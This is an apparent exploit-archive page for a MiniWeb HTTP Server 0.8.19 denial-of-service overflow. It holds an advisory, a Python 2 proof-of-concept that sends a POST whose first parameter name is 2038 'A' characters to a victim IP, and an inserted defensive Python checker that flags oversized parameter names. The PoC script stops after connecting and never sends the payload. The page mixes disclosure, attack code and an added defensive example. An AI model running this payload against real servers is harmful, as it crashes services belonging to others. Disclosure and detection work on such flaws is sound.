MiniWeb HTTP Server 0.8.19 Buffer Overflow

MiniWeb HTTP Server version 0.8.19 buffer overflow proof of concept exploit.

MD5 | 1c43ae8b9d8816d4006b30d2418d1582

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team -


MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.


The vulnerability is in the handling of the first parameter's name in the POST request body. Example: PARAM_NAME1=param_data1&param_name2=param_data2
If we send a lot of "A" characters as "PARAM_NAME1", the MiniWeb server will crash.
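
A defensive check for the condition described above, as an added example that is not part of the original advisory: it parses a raw HTTP request (for instance in a reverse proxy or over captured traffic) and reports form parameter names longer than a limit. The 256-byte limit, the function names and the sample request are assumptions constructed for illustration.

```python
# Added example, not from the advisory: flag form-encoded POST bodies whose
# parameter names are implausibly long, before they reach a fragile backend.
MAX_NAME_LEN = 256  # assumed policy limit; tune to the application's real forms


def split_request(raw: bytes):
    """Split a raw HTTP request into (request_line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def oversized_param_names(raw: bytes, limit: int = MAX_NAME_LEN):
    """Return [(position, name_length)] for each parameter name over the limit."""
    request_line, headers, body = split_request(raw)
    method = request_line.split(" ", 1)[0].upper()
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if method != "POST" or ctype != "application/x-www-form-urlencoded":
        return []
    findings = []
    for position, pair in enumerate(body.split(b"&")):
        # Measure the raw bytes before any percent-decoding: that is what the
        # server's parser copies. A pair without "=" counts wholly as a name.
        name = pair.partition(b"=")[0]
        if len(name) > limit:
            findings.append((position, len(name)))
    return findings


def build_sample(first_name: bytes) -> bytes:
    """Constructed sample request; host and values are placeholders."""
    return (b"POST /index.html HTTP/1.1\r\n"
            b"Host: example.test\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
            + first_name + b"=param_data1&param_name2=param_data2")


if __name__ == "__main__":
    for label, name in (("normal", b"PARAM_NAME1"), ("oversized", b"A" * 300)):
        print(label, oversized_param_names(build_sample(name)))
```

A request flagged at position 0 matches the pattern in this advisory; rejecting it at the proxy keeps the oversized name away from the server's parser.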

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here:



import socket
import sys
import struct

if len(sys.argv) != 2 :
    print "[+] Usage : python [VICTIM_IP]"
    sys.exit(1)  # stop here instead of failing on sys.argv[1] below

TCP_IP = sys.argv[1]
TCP_PORT = 8000

xx = "A"*2038 #4085

http_req = "POST /index.html HTTP/1.1\r\n"
http_req += "Host:\r\n"
http_req += "From: header-data\r\n"
http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."
